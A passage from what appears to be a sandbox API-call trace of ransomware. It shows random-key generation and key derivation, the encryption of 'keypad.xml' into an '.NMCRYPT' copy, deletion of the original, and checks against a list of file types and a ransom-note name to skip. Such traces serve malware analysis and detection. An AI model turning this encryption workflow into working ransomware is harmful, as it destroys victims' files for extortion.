hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.269] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.270] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0155.271] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.271] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0155.272] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0155.272] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0155.272] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad638) returned 1 [0155.272] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0155.272] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0155.272] wcslen (_String="\\\\?\\") returned 0x4 [0155.272] CryptDuplicateKey (in: hKey=0x9ad638, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad438) returned 1 [0155.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0155.272] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0155.272] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=693) returned 1 [0155.272] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0155.273] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4d40, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4d40*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.274] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.274] GetLastError () returned 0x0 [0155.274] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.275] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4d40, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4d40*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0155.275] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0155.275] GetLastError () returned 0x0 [0155.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0155.275] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4d40, nNumberOfBytesToRead=0xb5, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4d40*, lpNumberOfBytesRead=0x2d7e160*=0xb5, lpOverlapped=0x0) returned 1 [0155.275] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xb5, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0xc0) returned 1 [0155.275] GetLastError () returned 0x0 [0155.275] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0xc0, lpOverlapped=0x0) returned 1 [0155.275] ReadFile (in: hFile=0x1624, lpBuffer=0x28d4d40, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x28d4d40*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0155.275] WriteFile (in: hFile=0x588, lpBuffer=0x28d4d40*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x28d4d40*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0155.275] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml")) returned 0x20 [0155.275] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml", dwFileAttributes=0x20) returned 0 [0155.276] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned 1 [0155.276] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml")) returned 0 [0155.276] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" [0155.276] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions") returned 1 [0155.276] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD1AB.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd1ab.tmp")) returned 0xd1ab [0155.277] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD1AB.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd1ab.tmp"), dwFlags=0x1) returned 0 [0155.277] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\.xXD1AB.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\.xxd1ab.tmp")) returned 1 [0155.278] CryptDestroyKey (hKey=0x9ad438) returned 1 [0155.278] wcslen (_String="OK") returned 0x2 [0155.278] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.278] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0155.278] CryptDestroyKey (hKey=0x9ad638) returned 1 [0155.278] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0155.278] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0155.278] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.278] wcscmp (_String1="main", _String2=".") returned 1 [0155.278] wcscmp (_String1="main", _String2="..") returned 1 [0155.278] FindNextFileW (in: hFindFile=0x9ad578, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*NMCRYPT") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*Recovers your files.html") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*.exe") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*.dll") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*.lnk") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*.bat") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*.ini") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*.msi") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*.scf") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*pagefile.sys*") returned 0 [0155.278] PathMatchSpecW (pszFile="main.xml", pszSpec="*NTUSER.DAT*") returned 0 [0155.278] PathMatchSpecW 